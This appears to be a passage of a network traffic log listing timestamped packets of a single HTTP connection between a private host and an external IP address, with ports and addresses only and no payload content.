Sep 30, 2024 15:10:14.444263935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.444282055 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.444359064 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.444380999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.444570065 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.444570065 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.445014000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.445146084 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.445163965 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.445178032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.445317030 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.445523024 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.445993900 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.446240902 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.446258068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.446332932 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.446366072 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.446510077 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.446847916 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.446894884 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.446960926 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.447011948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.447210073 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.447210073 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.447328091 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.447643995 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.447736979 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.447788000 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.447912931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.447974920 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.448144913 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.448144913 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.448144913 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.448437929 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.448530912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.448591948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.448596001 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.448700905 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.448766947 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.448766947 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.448935986 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.449419022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.449471951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.449527979 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.449582100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.449748039 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.449748039 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.449918985 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.450237036 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.450402021 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.450418949 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.450515032 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.450536966 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.450716019 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.451395035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.451412916 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.451800108 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.451848984 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.451884031 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.451896906 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.451910019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.452116013 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.452266932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.452411890 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.452429056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.452442884 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.452675104 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.452675104 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.452846050 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.453159094 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.453176975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.453279972 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.453399897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.453413963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.453475952 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.453645945 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.453645945 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.454108953 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.454185963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.454212904 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.454252005 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.454368114 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.454421043 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.454591036 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.454883099 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.455034971 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.455070019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.455118895 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.455132008 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.455678940 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.455724955 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.455724955 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.455843925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.455857038 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.455894947 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.455908060 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.456100941 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.456302881 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.456686974 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.456702948 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.456716061 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.456731081 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.457007885 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.457519054 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.457586050 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.457637072 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.457715988 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.457715988 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.457748890 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.457914114 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.458107948 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.458415985 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.458440065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.458503008 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.458515882 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.458686113 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.458686113 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.459131002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.459247112 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.459362030 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.459430933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.459650040 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.459650040 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.459650040 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.459650040 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.460134983 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.460195065 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.460242033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.460290909 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.460669994 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.460686922 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.462007999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.462023973 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.462037086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.462378025 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.462419987 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.462433100 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.462445021 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.462456942 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.462469101 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.462481022 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.462609053 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.462609053 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.462622881 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.462800980 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.463020086 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.463090897 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.463176012 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.463188887 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.463609934 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.463609934 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.463902950 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.464087963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.464144945 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.464158058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.464685917 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.464685917 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.464709044 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.464894056 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.464906931 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.465055943 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.465100050 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.465842962 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.466906071 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.467140913 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.467185974 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.467199087 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.467210054 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.467226028 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.467274904 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.467355967 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.467381954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.467402935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.467468977 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.467470884 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.467704058 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.467704058 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.467705011 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.467888117 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.468194008 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.468230009 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.468332052 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.468468904 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.468615055 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.468615055 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.468615055 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.468799114 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.469134092 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.469177961 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.469393969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.469517946 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.469650984 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.469650984 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.469650984 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.469835043 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.469887018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.469944954 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.470016956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.470067024 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.470616102 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.470616102 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.470616102 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.470640898 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.470695019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.470798016 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.470819950 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.470993996 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.471621037 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.471621037 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.472196102 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.472219944 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.472239971 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.472259998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.472400904 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.472470999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.472521067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.472582102 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.472584009 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.472707033 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.472933054 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.472933054 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.472933054 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.473309040 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.473349094 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.473414898 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.473459959 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.473469019 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.473629951 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.473800898 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.474354029 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.474395990 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.474482059 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.474616051 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.474639893 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.474652052 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.474704027 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.474756956 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.474822998 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.474822998 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.475042105 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.475498915 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.475542068 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.475563049 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.475601912 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.475786924 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.504658937 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.504684925 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.504738092 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.504941940 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.506108999 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.506181002 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.506228924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.506248951 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.506450891 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.506504059 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.506550074 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.506568909 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.506654024 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.506666899 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.506666899 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.506844997 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.507035971 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.507097006 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.507142067 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.507194996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.507216930 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.507668018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.507793903 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.507793903 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.507843018 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.507889032 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.507909060 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.507980108 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.508176088 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.508874893 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.511280060 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.511320114 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.511378050 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.511388063 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.511734962 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.511734962 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.512193918 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.512295008 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.512418985 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.512470961 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.512542963 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.512670040 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.512681961 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.512681961 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.512722969 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.512736082 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.512867928 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.513060093 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.513518095 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.513567924 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.513627052 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.513680935 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.513844013 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.513879061 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.514033079 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.514395952 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.514492035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.514508009 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.514533043 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.514806032 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.514806032 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.514806032 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.515194893 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.515300035 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.515363932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.515377998 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.515662909 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.515662909 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.516098976 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.516148090 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.516273975 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.516288996 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.516575098 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.516755104 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.517004013 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.517035961 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.517102003 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.517154932 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.517555952 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.517860889 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.517937899 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.517951012 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.517962933 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.517975092 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.518017054 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.518225908 CEST	49754	80	192.168.11.20	172.67.215.93
Sep 30, 2024 15:10:14.519530058 CEST	80	49754	172.67.215.93	192.168.11.20
Sep 30, 2024 15:10:14.519571066 CEST	80	49754	172.67.215.93	192.168.11.20
